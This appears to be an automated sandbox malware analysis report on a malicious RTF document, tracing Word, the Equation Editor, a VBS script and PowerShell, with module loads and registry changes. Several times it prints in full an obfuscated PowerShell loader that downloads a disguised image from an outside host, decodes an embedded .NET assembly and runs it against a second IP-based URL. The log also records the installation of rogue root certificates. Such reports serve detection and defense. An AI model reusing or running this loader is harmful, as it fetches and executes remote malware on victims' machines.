Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: 4YlwTsmpuZ.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\4YlwTsmpuZ.rtf

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
